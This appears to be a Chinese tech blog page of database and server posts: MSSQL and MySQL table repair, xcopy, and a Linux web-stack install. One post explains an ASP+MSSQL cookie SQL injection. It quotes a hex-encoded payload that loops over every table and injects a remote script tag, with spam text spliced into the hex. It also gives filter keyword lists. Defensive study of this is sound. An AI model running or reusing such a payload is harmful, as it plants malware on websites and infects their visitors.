分页: 15/28 第一页 上页 10 11 12 13 14 15 16 17 18 19 下页 最后页 [ 显示模式: 摘要 | 列表 ]
Mar 14
如数据库名为:jingyihome
首先是设置为单用户模式,然后修复,最后是恢复多用户模式。
Alter DATABASE [jingyihome] SET SINGLE_USER
GO
DBCC CHECKDB('jingyihome',repair_allow_data_loss) WITH TABLOCK
GO
Alter DATABASE [jingyihome] SET MULTI_USER
GO


--CHECKDB 有3个参数:
--REPAIR_ALLOW_DATA_LOSS
-- 执行由 REPAIR_REBUILD 完成的所有修复,包括对行和页进行分配和取消分配以改正分配错误、结构行或页的错误,以及删除已损坏的文本对象。这些修复可能会导致一些数据丢失。修复操作可以在用户事务下完成以允许用户回滚所做的更改。如果回滚修复,则数据库仍会含有错误,应该从备份进行恢复。如果由于所提供修复等级的缘故遗漏某个错误的修复,则将遗漏任何取决于该修复的修复。修复完成后,备份数据库。
--REPAIR_FAST 进行小的、不耗时的修复操作,如修复非聚集索引中的附加键。这些修复可以很快完成,并且不会有丢失数据的危险。
--REPAIR_REBUILD 执行由 REPAIR_FAST 完成的所有修复,包括需要较长时间的修复(如重建索引)。执行这些修复时不会有丢失数据的危险。

--DBCC CHECKDB('jingyihome') with NO_INFOMSGS,PHYSICAL_ONLY
Mar 14
在服务器上复制文件时,经常需要连文件的权限一起复制,用以下命令,可以复制
xcopy g:\ f:\ /o /e /c
这样可以复制G:盘的全部内容到F:盘,连子目录,连权限,忽略出错信息,注意如果是复制网站内容,请先停止IIS再复制。
Mar 14
理想的情况是,MySQL从首次安装以来始终平稳地运行。但有时确实会由于各种原因而出现问题,其范围可以从电源断电到硬件故障到不正常地关闭MySQL服务器(如用kill -9 终止服务器或机器崩溃)。诸如这样的情况大部分都超出您的控制范围,它们会导致数据库表的毁坏,尤其是在对表进行修改且未完全写入时所引起的。
  本章的重点是检测和解决表的问题,而不论问题是如何引起的。对于表的检查和修复,MySQL管理员最好的朋友是myisamchk 和isamchk 实用程序。这两个程序有好几个功能,我们已经在第4章讨论了怎样使用它们执行索引键的分布分析和索引的释放与激活。还可以使用它们检查表和修复有问题的表。这使您能在表变坏之前(使表不能使用之前)修正故障。
  myisamchk 和isamchk 提供的全部选项的清单在附录E 中。有关其他的背景,请参阅MySQL参考指南的“维护MySQL安装”一章。

  表的故障检测和修正的一般过程如下:
  1) 检查出错的表。如果该表检查通过,则完成任务,否则必须修复它。
  2) 在开始修复之前对表文件进行拷贝,以防万一。
  3) 试着修复表。
  4) 如果修复操作失败,从数据库备份和更新日志中恢复此表。
  上述过程的最后一步假定您已经执行了数据库备份并允许更新日志有效。如果不是这样的话,系统将有危险。参考第11章查找一下怎样使用mysqlaump 和怎样开启更新日志。您肯定不想不可挽回地丢失一个表,因此,应努力地做备份。
  在使用myisamchk 或isamchk 检查或修复表之前,应该满足一些初步需求:
  建立常规的数据库备份过程并允许更新日志,以防事情越来越糟使表的毁坏不能修复。笔者好像在以前提醒过这一点?
  在开始试验之前应先仔细地阅读本章的内容。尤其是不应该在阅读“避免与MySQL服务器交互作用”之前进行操作,因为它将讨论当您试图在一个表上执行检查或修复过程时服务器正在使用这个表所引起的问题。它还讨论怎样在服务器运行时防止那些问题发生。
  当运行表检查或修复时,您应该被注册在运行mysql的账号下,因为您需要对表文件读写访问。
  

myisamchk 和isamchk 的调用语法

  MySQL的myisamchk 和isamchk 实用程序很类似,多数时候它们可以用同样的方式使用。它们之间的主要区别是它们所使用的表的类型。对于MyISAM 表,使用my i s a m c h k,而对于ISAM 表,则使用i s a m c h k。您可以通过表的索引文件的扩展名来告诉表使用哪种存储格式。扩展名“. M Y I”表明是一个MyISAM 表,而“. I S M”表明是ISAM 表。
  为了使用任一个实用程序,应指明您所要检查或修复的表,以及指明要执行的操作类型的选项:
  % myisamchk options tbl_name...
  % isamchk options tbl_name...
  tbl_name 参数可以是表名也可以是该表的索引文件名。如果指定多个表,可以很容易地使用文件名模式来拾取目录中所有相应的文件:
  % myisamchk options *.MYI
  % isamchk options *.ISM
  不会因为告诉了错误的程序来检查某个表而使该表毁坏,但是除了发布一条警告消息外此程序不做任何事情。例如,下面的第一条语句将检查当前目录中的所有MyISAM 表,而第二条语句只显示一条警告消息:
  % myisamchk *.MYI 正确
  % myisamchk *.ISM 不正确─文件类型错
  不论是myisamchk 还是isamchk 都不对表所在的位置做任何判断,因此,应该或者在包含表文件的目录中运行程序,或者指定表的路径名。这允许您将表文件拷贝到另一个目录中并用该拷贝进行操作。

检查表

  myisamchk 和isamchk 提供了表检查方法,这些方法在彻底检查表的程度方面有差异。通常用标准方法就足够了。如果标准检查报告没有发现错误而您仍然怀疑有毁坏(或许因为查询没有正常地工作),可能要执行更彻底的检查。要想用任意一个实用程序执行标准的表检查,则不用带任何选项直接调用即可:
  % myisamchk tbl_name
  % isamchk tbl_name
  为了执行扩充检查,使用--extend-check 选项。该选项非常慢,但检查极为彻底。对于该表的数据文件中的每个记录,索引文件中的每个索引的相关键都被检查以确保它真正指向正确的记录。myisamchk 还有一个中间选项- - m e d i um - c h e c k,它不如扩展检查彻底,但速度快。
  如果对于--extend-check 检查不报告错误,则可以肯定表是好的。如果您仍然感觉表有问题,那原因肯定在其他地方。应重新检查任何好像有问题的查询以验证查询是正确书写的。如果您认为问题可能是MySQL服务器的原因,应考虑整理一份故障报告或升级到新的版本上。
  如果myisamchk 或isamchk 报告表有错误,应用下节中的说明修复它们。

修复表

  表的修复是一项可怕的工作,如果具体问题非常独特则更难进行。然而,有一些常规的指导思想和过程,可以遵循它们来增加修正表的机会。通常,开始时可以用最快的修复方法,看看是否能修正故障。如果发现不行的话,可以逐步升级到更彻底的(但更慢的)修复方法上,直到故障被修复或您不能继续升级为止(实际上,大多数问题不用更大规模的和更慢的方法就能修正)。如果表不能修复,则从备份中恢复该表。有关使用备份文件和更新日志进行恢复的指导在已第11章中给出。
  1. 执行标准的表修复
  为了修复一个表,执行下列步骤:
  1) 试着用--recover 选项修正表,但也可以用--quick 选项试图只根据索引文件的内容进行恢复。这样将不触及数据文件:
  % myisamchk --recover --quick tbl_name
  % isamchk --recover --quick tbl_name
  2) 如果问题仍存在,再试一下上一步的命令,但忽略--quick 选项,以允许my i s a m c h k或isamchk 前进并修改数据文件:
  % myisamchk --recover tbl_name
  % isamchk --recover tbl_name
  3) 如果还不工作,试一试--safe-recover 修复方法。这种方法比普通的恢复方法要慢,但能够修正-recover 方法不能修正的几个问题:
  % myisamchk --safe-recover tbl_name
  % isamchk --safe-recover tbl_name
  如果myisamchk 或isamchk 由于一个“C a n’t create new temp file: file_name” 的错误消息在任何一步中停止,应该重复这个命令并增加--force 选项以迫使清除临时文件。这个临时文件可能是从上一次失败的修复中留下的。
  在修复表之前拷贝它们在执行表修复前应该遵循的一个常规的预防措施是做该表的新拷贝。这种情况未必出现,但如果发生,则可以从拷贝文件中做该表的新的拷贝并试试另一种恢复方法。
  2. 标准表修复方法失败时怎么办
  如果标准的修复过程未能修复表,则索引文件可能在修复时丢失或毁坏。尽管未必可能,但还是有可能使表的描述文件丢失。不论哪种情况,都需要替换受影响的文件,然后再试试标准修复过程。
  为了重新生成索引文件,可以使用下列过程:
  1) 定位到包含崩溃表的数据库目录中。
  2) 将该表的数据文件移到安全的地方。
  3) 调用mysql并通过执行下列语句重新创建新的空表,该语句使用表的描述文件tbl_name.frm 重新开始生成新的数据和索引文件:
  mysql> Delete FROM tbl_name;
  4) 退出mysql,将原始的数据文件移回到数据库目录中,替换刚建立的新的空文件。
  5) 再试试标准表修复方法。
  为了恢复该表的描述文件,可先从备份文件中恢复,然后再试着用标准修复方法。如果由于某些原因没有备份,但知道建立表的Create TABLE 语句,则仍可以恢复该文件:
  1) 定位到包含崩溃表的数据库目录中。
  2) 将该表的数据文件移动到安全的地方。如果想要使用索引的话,还需将索引文件移走。
  3) 调用mysql并发布Create TABLE 语句建立该表。
  4) 退出mysql,将原始数据文件移回数据库目录中,替换刚才新建的数据文件。如果在步骤2移动了索引文件,则也要将其移回数据库目录中。
  5) 再试试标准表修复方法。

避免与MySQL服务器交互作用

  当您正在运行表的检查/修复实用程序时,您或许不想让MySQL服务器和实用程序同时访问一个表。如果两个程序都向表中写数据显然是一件坏事,但是,当一个程序在写入时另一个程序在读取也不是件好事。如果表正由一个程序写入,同时进行读取的另一个程序会被
搞乱。
  如果您关闭服务器,就可以保证在服务器和myisamchk 或isamchk 之间没有交互作用。但是管理员极不愿意使服务器完全地脱机,因为这使得没有故障的数据库和表也不可用。本节中讨论的过程将帮助您避免服务器和myisamchk 或isamchk 之间的交互作用。
  服务器有两种类型的锁定方法。它使用内部锁定避免客户机的请求相互干扰──例如,避免客户机的Select 查询被另一个客户机的Update查询所干扰。服务器还使用外部锁定(文件级锁)来防止其他程序在服务器使用表时修改该表的文件。通常,在表的检查操作中服务器将外部锁定与myisamchk 或isamchk 组合使用。但是,外部锁定在某些系统中是禁用的,因为它不能可靠地进行工作。对运行myisamchk 和isamchk 所选择的过程取决于服务器是否能使用外部锁定。如果不使用,则必须使用内部锁定协议。
  如果服务器用--skip-locking 选项运行,则外部锁定禁用。该选项在某些系统中是缺省的,如L i n ux。可以通过运行mysqladmin variables 命令确定服务器是否能够使用外部锁定。检查skip_locking 变量的值并按以下方法进行:
  如果skip_locking 为o ff,则外部锁定有效。您可以继续并运行任一个实用程序来检查表。服务器和实用程序将合作对表进行访问。但是,在运行任何一个实用程序之前,应该用mysqladmin flush-tables 刷新表的高速缓存。为了修复表,应该使用表的修复锁定协议。
  如果skip_locking 为o n,则禁用外部锁定,但在myisamchk 或isamchk 检查或修复一个表时服务器并不知道,最好关闭服务器。如果坚持使服务器保持开启状态,需要确保在您使用此表时没有客户机来访问它。必须使用恰当的锁定协议告诉服务器使该表独处,并阻塞客户机对其访问。
  这里所描述的锁定协议使用服务器的内部锁定机制,以防止服务器在您利用my i s a m c h k或isamchk 工作时访问表。通常的办法是调用mysql并对要检查或修复的表发布L O C K TABLE 语句。然后,在mysql空闲时(即运行,但除了保持该表锁定外不用它做任何事情),运行myisamchk 或i s a m c h k。在myisamchk 或isamchk 结束后,可以切换到mysql会话中并释放该锁以告诉服务器程序执行完毕此表可以再次使用了。
  检查和修复的锁定协议有点区别。对于检查,您只需要获得读锁。在这种情况下,只能读取表,但不能修改它,因此它也允许其他客户机读取它。读锁足以防止其他客户机修改表。对于修复,您必须获得写锁以防止任何客户机在您对表进行操作时修改它。
  锁定协议使用LOCK TABLE 和UNLOCK TABLE 语句获得并释放锁。协议还使用F L U S H TABLES 告诉服务器刷新磁盘中任何未决的改变,并在通过表修复实用程序修改表后重新打开该表。您必须从单个mysql会话中执行所有L O C K、FLUSH 和UNLOCK 语句。如果锁定一个表然后退出mysql,则该锁将释放,且运行myisamchk 或isamchk 将不再是安全的!
  如果保持打开两个窗口的状态,且一个运行mysql,而另一个运行myisamchk 或i s a m c h k,则运行锁定过程将会变得很容易。这样允许您很容易地在程序之间进行切换。如果不是运行在视窗环境中,当运行myisamchk 或isamchk 时,将需要使用外壳程序的作业控制工具暂停和恢复mysql。下面的指导显示出对myisamchk 或isamchk 的命令,可用与您正在使用的表相对应的那个命令。
  1. 对检查操作锁定表
  此过程只针对表的检查,不针对表的修复。在窗口1中,调用mysql并发布下列语句:
  % mysqldb_name
  mysql>LOCK TABLE tbl_name READ;
  mysql>FLUSH TABLES;
  该锁防止其他客户机在检查时写入该表和修改该表。FLUSH 语句导致服务器关闭表的文件,它将刷新仍然在高速缓存中的任何未写入的改变。
  当mysql空闲时,切换到窗口2 并检查该表:
  % myisamchk tbl_name
  % isamchk tbl_name
  当myisamchk 或isamchk 结束时,切换回到窗口1的mysql会话并释放该表锁:
  mysql>UNLOCK TABLE;
  如果myisamchk 或isamchk 指出发现该表的问题,将需要执行表的修复。
  2. 对修复操作锁定表
  修复表的锁定过程类似于检查表的过程,但有两个区别。第一,您必须得到写锁而非读锁。由于您将要修改表,因此根本不允许客户机对其进行访问。第二,必须在执行修复之后发布FLUSH TABLE 语句,因为myisamchk 和isamchk 建立了新的索引文件,除非再次刷新
该表的高速缓存否则服务器将不会注意到它:
  % mysqldb_name
  mysql>LOCK TABLE tbl_name WRITE;
  mysql>FLUSH TABLES;
  利用mysql的空闲切换到窗口2,做该表的数据库文件的拷贝,然后运行myisamchk 或i s a m c h k:
  % cp tbl_name.* |some|other|directory
  % myisamchk --recover tbl_name
  % isamchk --recover tbl_name
  --recover 选项只是针对安装而设置的。这些特殊选项的选择将取决于您执行修复的类型。myisamchk 或isamchk 运行完成后,切换回到窗口1的mysql会话,再次刷新该表的高速缓存并释放表锁:
  mysql>FLUSH TABLES;
  mysql>UNLOCK TABLE;

快速运行myisamchk 和i s a m c h k

  myisamchk 和isamchk 的运行可能会花很长时间,尤其是您正在处理一个大表或使用一个更广泛的检查或修复方法时。通过告诉这些程序在运行时使用更多的内存,能够提高它们的速度。这两个实用程序都有几个可设置的操作参数。其中最重要的是控制程序使用的缓冲
区大小的变量:

变量 含义
key _ buffer _ s i z e 用于存放索引块的缓冲区大小
r e a d _ buffer _ s i z e 读操作用的缓冲区大小
sort _ buffer _ s i z e 排序用的缓冲区大小
w r i t e _ buffer _ s i z e 写操作用的缓冲区大小

  要想查看任一个程序使用的这些变量的缺省值,可用--help 选项运行该程序。要想指定其他的值,可在该命令上使用--set-variable variable=value 或-O variable=value。您可以将变量的名字简化成key、r e a d、sort 和w r i t e。例如,可告诉myisamchk 使用16MB 的排序缓冲区和1MB 的读写缓冲区,其调用如下:
  % myisamchk -0 sort=16M -0 read=1M write=1M ...
  sort _ buffer_size 只能利用--recover 选项来使用(而不是利用- - s a f e _ r e c o ver),在这种情况下,key _ buffer 不能使用。
  减少服务器的停机时间
  防止服务器访问(您正在处理的)表的另一种方法是在数据目录的外面使用该表文件的拷贝。这样并不能消除交互作用的问题,因为仍然必须防止服务器访问(并可能修改)正在进行拷贝的表。但是,如果您不愿意使服务器脱机的话,该路线可能是使服务器停机时间最小化的一种方法,这对您是有吸引力的。在将该表的文件拷贝到另一个目录时关闭服务器,然后恢复服务器。
  myisamchk 的未来打算
  myisamchk 的表检查和修复功能打算在MySQL3.23 版本系列的某个时候被合并到服务器中。如果这种打算实现,对表的检查和修复将更容易,因为服务器与my i s a m c h k的交互问题将不再会出现。
  同样,您能够告诉服务器在启动时检查表,因此在启动服务器前将不需要设置任何特殊的命令在引导期间执行。该程序不对ISAM 表进行操作,因此在服务器获得表的检修复能力时,应考虑将ISAM 表转换成MyISAM 表。请查看新发行版的MySQL参考指南,了解在此范围内有什么新进展。可以用Alter TABLE 语句转换表的类型:
  Alter TABLE tbl_name TYPE=MYISAM
Tags: , ,
Mar 11
正 文:

    这阵子,采用ASP+MSSQL设计的很多网站可能遭遇到sql数据库被挂马者插入JS木马的经历;这不,朋友的一个网站就被黑客忽悠了一把,mssql的每个varchar、text字段都被自动插入一段js代码,即使删除这段代码,如果没有从源头上解决,几分钟后,js代码就又会自动插入数据库。

    经过飘易的观察,这很有可能是程序自动执行的,黑客先从搜索引擎google、百度等搜索存在漏洞的采用asp+mssql设计的网站,然后采用小明子这样的注入扫描工具,扫描整个网站,一旦发现有sql注入的漏洞或者上传漏洞,黑客就通过各种手段,上传自己的大马,如海阳木马;然后,黑客就把这个网站纳入他的肉鸡列表,随时在数据库里加入自己希望加的js代码,而这些代码往往是包含着众多的的病毒、木马,最终让访问受控网站的用户的电脑中毒。

    虽然,可以通过sql查询分析器执行批量代换,暂时解决被插入的js代码问题,然而不从根本上解决整个网站存在的漏洞,包括程序上和服务器安全权限,那么黑客还是随时可以入侵你的网站数据库。

    在sql查询分析器里可以执行以下的代码批量替换js代码:
update 表名 set 字段名=replace(字段名,'<Script Src=http://c.n%75clear3.com/css/c.js></Script>','')

    flymorn仔细检查了网站,发现网站存在几个安全问题:

    第一,网站存在上传漏洞;虽然,上传文件需要管理员身份验证,也对上传文件进行了文件格式的认证,但管理员身份验证采用了cookies,而cookies是可以被伪造的,而且如果上传了图片后,不对该文件的内容采取任何判断的话,那么图片木马也很有可能被上传。

    flymorn的解决措施:1 删除上传文件功能(不太实际);2 修改上传用户验证为session验证;3 对上传后的文件内容进行验证,如果是图片木马,则删除;可以参考以下的验证代码:
''===============判断上传文件是否含非法字符串start================
set MyFile = server.CreateObject("Scripting.FileSystemObject")
set MyText = MyFile.OpenTextFile(Server.mappath(filePath), 1) '读取文本文件
sTextAll = lcase(MyText.ReadAll)
MyText.close
set MyFile = nothing
sStr="<%|.getfolder|.createfolder|.deletefolder|.createdirectory|.deletedirectory|.saveas|wscript.shell|script.encode|server.|.createobject|execute|activexobject|language="
sNoString = split(sStr,"|")
for i=0 to ubound(sNoString)
  if instr(sTextAll,sNoString(i)) then
    set filedel = server.CreateObject("Scripting.FileSystemObject")
    filedel.deletefile Server.mappath(filePath)
    set filedel = nothing
    Response.Write("<script>alert('您上传的文件有问题,上传失败!');history.back();</script>")
    Response.End
  end if
next
''=================判断上传文件是否含非法字符串end===================

     第二,网站存在cookies注入漏洞。由于程序设计中,为了考虑到减小服务器的开销,所有用户登陆后采用cookies验证,这个cookies里保存了用户的 ID 和 NAME ,而众所周知,cookies是经常被黑客伪造的,这是其一;另外,某些外部参数 没有采用严格的 request.form 和 request.querystring 来获取内容,为了简便,采用了 request("id") 这样的方式。

     我们知道,ASP 的request 是先从form、querystring里获取内容,如果这两个为空,则要从cookies里获取内容,大家往往在程序设计中考虑到了 request.form 和 request.querystring 的SQL注入,所以一般都会过滤 request.form 和 request.querystring进行sql注入;但却偏偏忘了过滤cookies方式下的注入。我们来看下下面这样的sql语句:
SQL="select * from 表名 where id="&request("id")

    如果这个 id 恰巧是通过cookies来获取值的,那么想想,这是一件多么可怕的事啊!注入者可以轻松的伪造一个名为 id 的虚假 cookies ,因为这个 id 的cookies 是服务器分配给客户端的。这个cookies可以被伪造成类似下面这样的一段代码:
dEcLaRe @s vArChAr(4000);sEt @s=cAsT(0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c6
15265207441624c655f637572736f5220635572536f5220466f522073456c456354206 IT人才网(http://it.ad0.cn) 12e6e416d452c622e6e416d
452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e694www.ad0.cn43d622e6
94420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3
335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f6375
72736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768
696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742
b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275
d29292b27273c2f7469746c653e3c736372697074207372633d687474703a2f2f2536622536622533362532652537
352537332f312e6a733e3c2f7363726970743e27272729206645744368206e6578742046724f6d207441624c655f6
37572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f4
3615465207441624c655f637572736f520d0a aS vArChAr(4000));exec(@s);--

看晕了吧。这是利用HEX的方式进行SQL注入,可以绕过一般的IDS验证,只要系统存在SQL注入,上面的代码将会被执行,通过游标遍历数据库中的所有表和列并在列中插入js代码。

     飘易采取的解决办法:1 严格过滤 request.form 和 request.querystring 获取的内容,坚决不用 request("name") 这样的方式获取值,凡是采用 cookies 保存的内容,尽量不要用在sql语句里进行查询数据库操作;2 重要的用户资料尽量采用 session 验证,因为session是服务器端的,客户端无法伪造数据,除非他有你服务器的权限。

     可以采用以下的防范 get 、post以及cookies 注入的代码来过滤 sql 注入攻击:
<%
Response.Buffer = True  '缓存页面
'防范get注入
If Request.QueryString <> ""  Then StopInjection(Request.QueryString)
'防范post注入
If Request.Form <> ""  Then StopInjection(Request.Form)
'防范cookies注入
If Request.Cookies <> ""  Then StopInjection(Request.Cookies)

'正则子函数
Function StopInjection(Values)
Dim regEx
Set regEx = New RegExp
    regEx.IgnoreCase = True
    regEx.Global = True
    regEx.Pattern = "'|;|#|([\s\b+()]+([email=select%7Cupdate%7Cinsert%7Cdelete%7Cdeclare%7C@%7Cexec%7Cdbcc%7Calter%7Cdrop%7Ccreate%7Cbackup%7Cif%7Celse%7Cend%7Cand%7Cor%7Cadd%7Cset%7Copen%7Cclose%7Cuse%7Cbegin%7Cretun%7Cas%7Cgo%7Cexists)[/s/b]select|update|insert|delete|declare|@|exec|dbcc|alter|drop|create|backup|if|else|end|and|or|add|set|open|close|use|begin|retun|as|go|exists)[\s\b[/email]+]*)"
    Dim sItem, sValue
    For Each sItem In Values
        sValue = Values(sItem)
        If regEx.Test(sValue) Then
            Response.Write "<Script Language=javascript>alert('非法注入!你的行为已被记录!!');history.back(-1);</Script>"
            Response.End
        End If
    Next
    Set regEx = Nothing
End function
%>

     把以上的代码另存为一个文件,如 antisql.asp ,然后在数据库连接文件开头包含这个文件 <!--#include file="antisql.asp"--> ,就可以实现全站的防范 sql 注入的攻击了。

     第三,严格过滤外部提交数据。判断提交页面的来源,如果不是当前站点,则拒绝提交。可以参考以下的代码,虽然来源网址可以伪造,但有这样的判断,毕竟可以阻挡那些没有技术含量的恶意提交:
<%''判断来源,禁止外部提交
dim server_v1,server_v2
server_v1=Cstr(Request.ServerVariables("HTTP_REFERER"))
server_v2=Cstr(Request.ServerVariables("SERVER_NAME"))
if server_v1="" or instr(server_v1,"发表页面名")<=0 or mid(server_v1,8,len(server_v2))<>server_v2 then
response.write "<SCRIPT language=JavaScript>alert('来源非法,禁止外部提交!');"
response.write "this.location.href='vbscript:history.back()';</SCRIPT>"
response.end
end if%>

     第四,做好服务器权限的分配。对于数据库的权限,尽量分配最小的权限给用户使用,如果把sa或管理员的权限分下来,一旦被攻击沦陷,这将是一个毁灭性的打击。mssql 的1433端口,飘易建议不用的时候,最好关闭。

     总之,安全问题是一个综合的问题,一个小的细节,可能让你的几个月甚至几年的心血付之东流。我们不仅要从程序上着手每个细节,而且要仔细做好服务器的安全工作,对于虚拟主机的用户,还要防范服务器上的跨站攻击。细节决定成败。
Mar 5
经过半天的努力终于将JSP+PHP+apache+resin在LINUX平台下全部配置完毕并完全整和通过测试成功
http://www.dfmqp.cn
本人的全部安装过程提供给LINUX爱好者共同分享,需要软件如下

resin:http://www.caucho.com/
jdk:http://java.sun.com/
apache:http://www.apache.org
mysql:http://www.mysql.com
php:http://www.php.net
jdbc:http://mmmysql.sourceforge.net/
本人所用的软件版本如下:
resin-3.0.10.tar.gz
j2sdk-1_4_2_05-linux-i586.bin
httpd-2.0.52.tar.gz
mysql-4.1.9.tar.gz
php-4.3.10.tar.gz
mysql-connector-java-3.1.6.tar.gz

一.安装MYSQL
我把他全部下在到/root 目录下
# chmod 755 mysql-4.1.9.tar.gz
# tar xfz mysql-4.1.9.tar.gz
解压后生成mysql-4.1.9目录,我们进入该目录:  
cd mysql-4.1.9
进入后就开始配置mysql了,配置过程中我们要给mysql设置一个安装目录,我们设置在 /usr/local/mysql 下,以为把文件放到一个地方比较容易管理,如果你还想获得更多的配置信息,使用 ./configure --help:
在这里我要特别强调在 编译的时候要选择好MYSQL的默认编码,因为如果不选择按默认安装的时候在JSP中就不支持GBK编码了
所以我这样编译
# ./configure --prefix=/usr/local/mysql --with-charset=gbk
然后等几秒钟,配置完成后就编译源代码
# make  
这个编译的过程比较长,如果机器比较慢的话,可能要近二十分种 ( 我的是联想服务器都需要了15分钟 ) . 编译完成后就安装:  
# make install
等上几秒钟,安装完成.下面就到了最关键的部分了,为什么老安装不成功,(至少我是安装了N次,N > 10 ,呵呵),问题关键就在这里,访问mysql要一个专门的用户,而且必须给相应的访问权限,这里我们就设置root和mysql有权限访问.  
我们先建立一个mysql和mysql用户来访问mysql:  
#  groupadd mysql #建立mysql组  
#  useradd mysql -g mysql #建立mysql用户并且加入到mysql组中  

建立用户后我们就初始化表 (注意:必须先执行本步骤后才能进行以下步骤)  

# ./scripts/mysql_install_db --user=mysql #初试化表并且规定用mysql用户来访问初始化表以后就开始给mysql和root用户设定访问权限, 我们先到安装mysql的目录:  

# cd /usr/local/mysql  

然后设置权限  

# chown -R root . #设定root能访问/usr/local/mysql  
# chown -R mysql var #设定mysql用户能访问/usr/local/mysql/var ,里面存的是mysql的数据库文件  
# chown -R mysql var/. #设定mysql用户能访问/usr/local/mysql/var下的所有文件  
# chown -R mysql var/mysql/. #设定mysql用户能访问/usr/local/mysql/var/mysql下的所有文件  
# chgrp -R mysql . #设定mysql组能够访问/usr/local/mysql  

设置完成后,基本上就装好了,好了,我们运行一下我们的mysql:  

# /usr/local/mysql/bin/mysqld_safe --user=mysql &  

如果没有问题的话,应该会出现类似这样的提示:  

[1] 42264  
# Starting mysqld daemon with databases from /usr/local/mysql/var  

这就证明你安装成功了
用如下命令修改MYSQL密码,默认安装密码为空,为了安全你必须马上修改
/usr/local/mysql/bin/mysqladmin -uroot password pengyong
现在修改的密码为:pengyong

二、安装jdk
# chmod 755 j2sdk-1_4_2_05-linux-i586.bin
# ./j2sdk-1_4_2_05-linux-i586.bin 释放j2sdk-1_4_2_05-linux-i586.bin
在/root目录下生成j2sdk1.4.2_05目录和文件我是将JDK装到/usr/java/目录下
将文件剪切到/usr/java/目录下
# mv j2sdk1.4.2_05/ /usr/java/
设置JDK变量环境

# vi /etc/profile
# /etc/profile
JAVA_HOME=/usr/java/j2sdk1.4.2_05
RESIN_HOME=/usr/resin
PATH=$PATH:$JAVA_HOME/bin
CLASSPATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar:$JAVA_HOME/lib/htmlco
nverter.jar:$RESIN_HOME/lib:/usr/java/jdbc/mysql-connector-java-3.1.6-bin.jar
退出当前登录的环境,重新登录,这样刚刚设定的环境变量就会生效,然后用如下命令测试:
[root@LINUX root]# echo $JAVA_HOME
/usr/java/j2sdk1.4.2_05
[root@LINUX root]# echo $CLASSPATH
.:/usr/java/j2sdk1.4.2_05/lib/dt.jar:/usr/java/j2sdk1.4.2_05/lib/tools.jar:/usr/
java/j2sdk1.4.2_05/lib/htmlconverter.jar:/usr/resin/lib:/usr/java/jdbc/mysql-con
nector-java-3.1.6-bin.jar
[root@LINUX root]# echo $PATH
/usr/kerberos/sbin:/usr/kerberos/bin:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bi
n:/usr/local/sbin:/usr/bin/X11:/usr/java/j2sdk1.4.2_05/bin:/usr/X11R6/bin:/root/
bin
[root@LINUX root]# java -version
java version "1.4.2_05"
Java(TM) 2 Runtime Environment, Standard Edition (build 1.4.2_05-b04)
Java HotSpot(TM) Client VM (build 1.4.2_05-b04, mixed mode)

看到类似信息就表示jdk环境已经好了。其实在上面的/etc/profile中,我们不仅仅设置了jdk的环境变量,还一并设置了resin和jdbc的环境变量,这些都是后面安装resin所必需的设定
三、安装mysql的jdbc
# tar xfz mysql-connector-java-3.1.6.tar.gz
# mv mysql-standard-4.0.23-pc-linux-i686/ /usr/java/ 将解压的文件剪切到/usr/java/目录下。
# cd /usr/java/
# ln -s mysql-standard-4.0.23-pc-linux-i686/ jdbc 创建JDBC的软连接与/usr/java/目录下
四、安装apache
# chmod 755 httpd-2.0.52.tar.gz
# tar xfz httpd-2.0.52.tar.gz
# cd httpd-2.0.52
开始配置APACHE

# ./configure --prefix=/usr/java/httpd2 --enable-module=most --enable-shared=max
察看编译进apache的模块:
#/usr/java/httpd2/bin/httpd -l
[root@LINUX root]# /usr/java/httpd2/bin/httpd -l
compiled-in modules:
  http_core.c
  mod_so.c
看到以上的信息表明apache支持dso方式了。这样就可以用dso的方式把php和resin的模块加进来。

五、安装php
我们使用的PHP版本是4.3.10,先去下载: http://www.php.net/downloads.php, 下回来的包叫做 php-4.3.10.tar.gz, 放到/usr/local/src目录下.  
首先进入该目录后解压缩:  
# cd /usr/local/src  
# tar xfz php-4.3.10.tar.gz  
解压后进入目录:  
# cd php-4.3.10
进行配置,这一步比较关键,一定要设置好,特别是要考虑到你要支持什么,比如GD库,xml,mysql等等,如果想知道详细的配置,执行 ./configure --help来获得:

# ./configure --with-mysql=/usr/java/mysql --with-apxs=/usr/java/httpd2/bin/apxs

果上面的配置没有错误的话,那么应该最后会显示感谢使用PHP等字样,那么证明配置成功,如果上面的配置选项不支持的话,会提示错误.  
比如你没有安装mysql,那么--with-mysql就无法使用,所以一定要注意对应选项系统是否能够支持,如果出现错误,那么就先安装对应的程序,或者去掉相关选项,配置之后就进行编译:  

# make  

编译成功后出现"Build complete."字样,那么就可以进行安装了:  

# make install  

安装完成后把/usr/local/src/php-4.3.8/php.ini-dist复制到/usr/local/lib/,并重命名为php.ini  

# cp /usr/local/src/php-4.3.10/php.ini-dist /usr/local/lib/php.ini  

基本到这里PHP就安装成功了,如果中间出现错误,除了在配置的时候没有选对选项之后一般都不出现错误.
为了让Apache能够直接解析php,我们还要进行一些配置.
# vi /usr/java/httpd/conf/httpd.conf
在httpd.conf文件中,添加  

AddType application/x-httpd-php .php  
AddType application/x-httpd-php-source .phps  

应该将以上两句添加在其他AddType之后。  

确保文件中有以下一句话,没有就自己添加在所有LoadModule之后。  

LoadModule php4_module modules/libphp4.so  

好了,在vi中使用":wq"保存httpd.conf文件,退出vi。启动apache server:  

# /usr/java/httpd2/bin/apachectl restart  
现在apache就能够运行php了,写个文件测试一下,在/usr/java/httpd2/htdocs目录下,新建一个phpinfo.php文件,  
文件中只有一行代码:  

<? phpinfo(); ?>  

保存此文件, 在你的浏览器中输入http://localhost/phpinfo.php,你应该看到PHP的系统信息。  
如果出现错误,比如提示你下灾phpinfo.php,那么apache就是还无法解析php文件,那么请仔细检查以上的操作是否正确.  


六.安装resin
下载的resin的安装包解开后应该可以直接单独运行的。笔者将其解开后放到/usr/java/目录下
# tar xfz resin-3.0.10.tar.gz
